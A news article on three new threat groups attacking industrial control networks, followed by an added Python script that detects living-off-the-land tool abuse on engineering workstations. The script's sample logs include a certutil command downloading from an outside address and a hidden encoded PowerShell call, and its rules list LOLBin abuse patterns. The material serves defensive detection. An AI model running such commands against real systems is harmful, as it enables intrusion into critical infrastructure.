Attack at the Edge: How New Hacker Groups Are Breaching Industrial Defenses
A trio of newly discovered threat actors are carving new attack paths into operational technology environments, exposing critical infrastructure worldwide.
In the shadows of global conflict, a new breed of cyber adversaries is quietly rewriting the rules of digital warfare. While the world’s attention has been fixed on the fallout from the Ukraine war, threat actors have pivoted their gaze - and their tools - toward the operational technology (OT) systems that underpin modern civilization. From power grids to water utilities, these newly identified hacking groups are finding fresh ways to breach the digital walls that guard the world’s most vital machinery.
Fast Facts
- Three new threat groups - Sylvanite, Azurite, and Pyroxene - have been identified targeting OT environments.
- Sylvanite specializes in initial access, exploiting edge devices to pave the way for more sophisticated attacks by allied groups.
- Azurite leverages compromised small office/home office networks to infiltrate engineering workstations using stealthy, native system tools.
- Pyroxene uses social engineering, including fake recruiter profiles, to breach targets across aerospace, defense, and maritime sectors.
- Longstanding groups like Electrum are expanding attacks into Europe and the U.S. as the cyber phase of the Ukraine war wanes.
Dragos, an industrial cybersecurity firm, has sounded the alarm on an evolving threat landscape. Their latest report details how three new hacking groups are not just targeting but actually enabling access to OT environments - the networks that control everything from electricity to transportation. The stakes couldn’t be higher: successful attacks here can cause real-world chaos, not just stolen data.
The first group, Sylvanite, has emerged as a specialist in breaching the perimeter. Unlike espionage-focused groups that aim to stay embedded for months, Sylvanite’s role is surgical: exploit vulnerabilities in edge devices (internet-facing appliances and services such as VPN gateways, firewalls and device-management servers that sit between the outside world and the OT network), then hand off access to bigger players. Their handiwork was evident in a May 2025 breach at a U.S. utility, where flaws in Ivanti Endpoint Manager Mobile (including the newly catalogued CVE-2025-4427 and CVE-2025-4428, an authentication bypass and a code-injection bug that can be chained for unauthenticated remote code execution) were used as a digital crowbar.
Once the doors are opened, groups like Voltzite - linked to the notorious Volt Typhoon - move in for long-term control. The collaboration is clear: Sylvanite is the locksmith, Voltzite the burglar.
Azurite, another fresh face, blends in by using compromised home and small-business networks as launchpads, so that its traffic arrives from residential ISP address space rather than from known hostile infrastructure. Its specialty is “living off the land”: running legitimate, already-installed system tools instead of dropping custom malware, so that activity on engineering workstations inside industrial networks looks like routine administration.
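The practical consequence of the Azurite pattern described above is that antivirus signatures see nothing: a defender has to look at how built-in tools are invoked and where interactive sessions to engineering workstations originate. The following script is an added example written for this page, not code from Dragos or from the article; it runs two simple checks over constructed Sysmon-style process-creation and Windows logon records in JSON Lines (the field names, the `EWS-` host-naming convention and the allowed address ranges are assumptions): flag LOLBin command lines that match download, decode or encoded-script patterns or that were spawned by a remote-execution parent, and flag network or RDP logons to an engineering workstation from outside the expected OT ranges.

```python
"""Toy detection pass for living-off-the-land activity on engineering
workstations (EWS). Added example, not from the Dragos report or the
article. Events are constructed Sysmon-style process-creation and Windows
logon records in JSON Lines; field names and ranges are assumptions."""
import ipaddress
import json
import re

# Hosts whose names start with this prefix are treated as engineering
# workstations (assumed site naming convention).
EWS_PREFIX = "EWS-"

# Address ranges from which interactive access to the OT network is
# expected (assumed: the site's jump hosts and engineering VLAN).
ALLOWED_NETS = [ipaddress.ip_network("10.50.0.0/16"),
                ipaddress.ip_network("10.60.1.0/24")]

# LOLBin rules: (binary name, regex over the command line, label).
LOLBIN_RULES = [
    ("powershell.exe", re.compile(r"-(enc|encodedcommand)\b", re.I), "encoded PowerShell"),
    ("certutil.exe",   re.compile(r"-urlcache|-decode", re.I),       "certutil download/decode"),
    ("mshta.exe",      re.compile(r"https?://", re.I),                "mshta remote HTA"),
    ("regsvr32.exe",   re.compile(r"/i:https?://|scrobj\.dll", re.I), "regsvr32 scriptlet"),
    ("rundll32.exe",   re.compile(r"javascript:", re.I),             "rundll32 javascript"),
    ("wmic.exe",       re.compile(r"process\s+call\s+create", re.I), "WMI process spawn"),
]
LOLBIN_NAMES = {name for name, _, _ in LOLBIN_RULES}
# Parents that mean the tool was launched remotely (WMI, WinRM, PsExec)
# rather than by a user at the console.
REMOTE_EXEC_PARENTS = {"wmiprvse.exe", "wsmprovhost.exe", "psexesvc.exe"}


def parse_events(lines):
    """Parse JSON Lines, skipping blank or malformed lines instead of aborting."""
    events = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return events


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def check_process(ev):
    """Return a finding for a suspicious process-creation event, else None."""
    image, parent = basename(ev.get("image", "")), basename(ev.get("parent_image", ""))
    cmd = ev.get("command_line", "")
    for binary, pattern, label in LOLBIN_RULES:
        if image == binary and pattern.search(cmd):
            return f"{ev['host']}: {label} ({cmd[:60]})"
    if image in LOLBIN_NAMES and parent in REMOTE_EXEC_PARENTS:
        return f"{ev['host']}: {image} spawned by {parent} (remote execution)"
    return None


def check_logon(ev):
    """Flag network (3) or RDP (10) logons to an EWS from outside ALLOWED_NETS."""
    if ev.get("logon_type") not in (3, 10):
        return None
    try:
        src = ipaddress.ip_address(ev.get("src_ip", ""))
    except ValueError:
        return f"{ev['host']}: logon with unparseable source {ev.get('src_ip')!r}"
    if any(src in net for net in ALLOWED_NETS):
        return None
    return f"{ev['host']}: logon type {ev['logon_type']} from unexpected {src}"


def run_detection(lines):
    """Run both checks over engineering-workstation events; return findings in order."""
    findings = []
    for ev in parse_events(lines):
        if not ev.get("host", "").upper().startswith(EWS_PREFIX):
            continue
        if ev.get("event") == "process_create":
            finding = check_process(ev)
        elif ev.get("event") == "logon":
            finding = check_logon(ev)
        else:
            finding = None
        if finding:
            findings.append(finding)
    return findings


# Constructed sample telemetry (not real logs). Events 1, 2, 3 and 7 should fire.
SAMPLE_LOG = [json.dumps(e) for e in [
    {"event": "process_create", "host": "EWS-PLC01", "parent_image": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\certutil.exe",
     "command_line": "certutil.exe -urlcache -split -f http://198.51.100.7/u.txt u.txt"},
    {"event": "process_create", "host": "EWS-PLC01", "parent_image": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "command_line": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"},
    {"event": "logon", "host": "EWS-HMI02", "logon_type": 10, "src_ip": "203.0.113.45", "user": "ot\\engineer"},
    {"event": "logon", "host": "EWS-HMI02", "logon_type": 10, "src_ip": "10.50.3.12", "user": "ot\\engineer"},
    {"event": "process_create", "host": "HIST-01", "parent_image": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\certutil.exe", "command_line": "certutil.exe -urlcache -f http://x/y"},
    {"event": "process_create", "host": "EWS-PLC01", "parent_image": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\notepad.exe", "command_line": "notepad.exe ladder.txt"},
    {"event": "process_create", "host": "EWS-PLC01", "parent_image": "C:\\Windows\\System32\\wsmprovhost.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "command_line": "powershell.exe Get-Service"},
]]

if __name__ == "__main__":
    for finding in run_detection(SAMPLE_LOG):
        print(finding)
```

Note that the fifth sample event (the same certutil download on a historian host) is deliberately not flagged: the script scopes itself to engineering workstations to keep the example focused, but in a real deployment the host filter would be widened to every OT asset. The seventh event shows why the parent-process rule matters: `powershell.exe Get-Service` is harmless on its face and only becomes interesting because it was launched through WinRM.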
Meanwhile, Pyroxene is perfecting the art of deception. By posing as recruiters on platforms like LinkedIn, they lure employees into unwittingly opening the gates. Their reach has expanded rapidly from the Middle East into North America and Europe, and they’ve already deployed destructive wiper malware against strategic targets during recent conflicts.
These new attackers don’t operate in a vacuum. Veteran groups such as Kamacite and Electrum - associated with the 2015 and 2016 attacks on Ukraine’s power grid - are ramping up operations, targeting supply chains and renewable energy installations in Europe. The December attack on Polish energy infrastructure, which affected wind and solar facilities, bore their signature. As global tensions shift, so too do the priorities of these state-aligned groups, with U.S. and European infrastructure now firmly in the crosshairs.
The message is clear: as geopolitical cyberwars ebb and flow, the world’s OT environments are becoming the new frontline. The attackers are more specialized, more coordinated, and more ambitious than ever. For defenders, vigilance at the digital edge is no longer optional - it’s a necessity for national security.
WIKICROOK
- Operational Technology (OT): Operational Technology (OT) includes the computer systems that monitor and control industrial equipment and physical processes. Long equipment lifecycles, infrequent patching and safety constraints on downtime often leave these systems more exposed than traditional IT systems.
- Edge Devices: Edge devices are internet-facing hardware like firewalls or VPNs that control access between internal networks and the outside world, making them prime security targets.
- Living off the Land (LotL): Living off the Land means attackers use trusted, already-installed system tools (LOLBins such as PowerShell, certutil or WMI) for malicious actions, so that their activity blends in with legitimate administration and is hard to detect with signature-based tools.
- Wiper Malware: Wiper malware is malicious software that deliberately deletes or corrupts files, often including boot records and backups on reachable systems, so that recovery is impossible without offline backups and the result is severe data loss or system disruption.
- Social Engineering: Social engineering is the use of deception by hackers to trick people into revealing confidential information or providing unauthorized system access.